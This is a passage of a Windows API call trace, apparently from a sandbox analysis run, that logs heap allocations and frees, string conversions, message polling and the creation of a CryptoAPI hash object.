lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51d78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0268.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.374] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.374] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0268.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0268.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0268.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0268.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0268.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0268.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0268.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0268.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0268.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0268.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0268.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.407] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f48 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0268.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0268.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0268.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55098, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fb8 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0268.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: 